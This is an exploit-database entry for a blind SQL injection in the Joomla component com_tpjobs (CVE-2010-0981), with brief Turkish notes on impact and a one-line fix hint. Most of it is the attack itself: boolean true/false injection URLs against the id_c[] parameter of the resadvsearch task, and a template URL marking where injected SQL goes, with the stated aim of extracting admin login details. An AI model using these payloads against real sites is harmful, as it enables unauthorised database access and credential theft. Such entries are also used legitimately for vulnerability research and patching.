Joomla Component com_tpjobs Blind SQL injection Vulnerability



EDB-ID: 10950 CVE: 2010-0981 OSVDB-ID: 61477
Author: FL0RiX Published: 2010-01-03 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
<------------------- header data start ------------------- >

#####################################################################
#Joomla Component com_tpjobs Blind SQL injection Vulnerability
#####################################################################

# author        : FL0RiX

# Name           : com_tpjobs

# Bug Type       : (Blind) SQL Injection

# Infection      : Admin login bilgileri al&#305;nabilir.

# Demo Vuln.     :
TRUE(+)
» http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1
FALSE(-)
» http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0

# Bug Fix Advice : Zararl&#305; karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]

< -- bug code end of -- >